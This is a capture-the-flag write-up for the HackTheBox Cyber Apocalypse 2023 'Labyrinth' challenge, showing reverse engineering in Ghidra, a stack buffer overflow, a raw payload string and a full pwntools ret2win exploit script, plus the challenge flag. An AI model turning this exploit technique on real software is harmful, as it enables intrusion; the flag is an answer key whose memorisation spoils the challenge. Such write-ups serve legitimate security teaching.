Home HtB - CA2023 - Labyrinth
Post
Cancel

HtB - CA2023 - Labyrinth

Posted Apr 19, 2023 Updated Dec 12, 2023
By Hack Sparrow
2 min read

banner HackTheBox Cyber Apocalypse 2023

You find yourself trapped in a mysterious labyrinth, with only one chance to escape. Choose the correct door wisely, for the wrong choice could have deadly consequences.

source_code

Analysis

Exploring the immediate program, it’s hard to tell what may be going on, so we’ll open it in Ghidra right off the bat; Ghidra - main function

Here we can see that the first input is compared to ‘69’ or ‘069’, then the second input is taken with fgets as a buffer size of 0x44 (potentially buffer overflow there) – followed by an immediate message saying “you failed”.

Let’s try to run the program with that information and see what we get; segmentation fault

It looks like we’re on the right track with a buffer overflow!

While we still have Ghidra open, let’s see what other information we can find. Mainly a function to point our stack to for our overflow; escape_plan function

This looks like the function we want to execute, now to just find the address of that function; escape_plan mem address

Now we can open our program in gdb-peda and look for the offset to begin constructing our payload for the buffer overflow attack;

Steps to build payload;

  1. create a pattern to find the offset; offset step 1
  2. find the offset;
    • offset step 2
    • offset step 2
  3. construct our payload;
    • initial payload AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAU\x12@\x00\x00\x00\x00\x00
  4. testing;
    • initial payload test It looks like our program is still crashing at this point.. after much trial and error we discovered that the stack needed to be realigned to 16 bytes again. We can do this by simply calling the immediate ret instruction

Solution

We’ll compile this info into a python script to avoid any issues with inputting binary data;

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18

#!/usr/bin/env python
from pwn import *

#io = remote('ip','port) # change to ip & port to run remotely
io = process('./labyrinth')

pntr_addr = 0x00401255 # escape_plan() address
ret_addr = 0x401602 # return address

# Craft the payload
payload = b'A' * 56 # our buffer padding
payload += p64(ret_addr) + p64(pntr_addr)

# send payload
io.sendline(b'069')
io.sendlineafter('>> ', payload)

io.interactive()

flag Exploit code

Uncomment our remote connection and comment out our local one, adjust the port & IP, and we get our flag!

Flag HTB{3sc4p3_fr0m_4b0v3}

hackthebox, Cyber Apocalypse 2023, pwn
write-up pwn binary-exploit buffer-overflow hackthebox ctf
This post is licensed under CC BY 4.0 by the author.
Recently Updated
Contents

HtB - CA2023 - Hijack

HtB - CA2023 - Persistence

Comments powered by Disqus.